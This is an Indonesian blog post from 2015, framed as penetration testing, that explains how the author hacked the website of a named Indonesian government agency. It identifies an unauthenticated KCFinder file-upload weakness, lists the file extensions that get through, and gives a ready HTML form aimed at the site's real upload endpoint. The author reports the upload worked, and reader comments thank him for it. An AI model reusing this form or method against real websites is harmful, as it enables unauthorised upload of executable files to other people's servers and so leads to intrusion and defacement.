Rabu, 29 Juli 2015

Penetration Testing Website bbia.go.id

6 komentar :
Assalamualaikum , Kali ini saya akan membagikan cara meretas website Balai Besar Industri Agro Indonesia , Lansung saja ke TKP !

Vulnerable Type : CSRF KCFinder File Upload
Can upload file : .php5 | php.pjpeg

Step satu kita cari kelemahan pada  web tersebut dengan melakukan dorking .

saya menemukan kcfinder file ? ya . disitu saya inget bahwa ckfinder mempunyai kelemahan .

saya coba upload.php dan ternyata error ? tidak
saya coba akali dan saya teringat pada csrf .

ok ini code csrf nya :

<title>CSRF Upload</title>
<form enctype="multipart/form-data"
action="http://bbia.go.id/bbia/admin/ckeditor/kcfinder/upload.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

upload file , dan berhasil /^_^


sekian dan terimakasih ..

6 komentar :

  1. Mantep nihh ijin comot masta (y)
    Thank infonya ..

    o
    lokerilmu-it.blogspot.com
    o

    BalasHapus
  2. BookMark ahh websitenya berguna nihh, hehehe :) jangan lupa tambah materi lagi yakk :)

    BalasHapus
    Balasan
    1. terima kasih mas , semakin banyak yang mengunjungi semakin sering saya share materi ..

      Hapus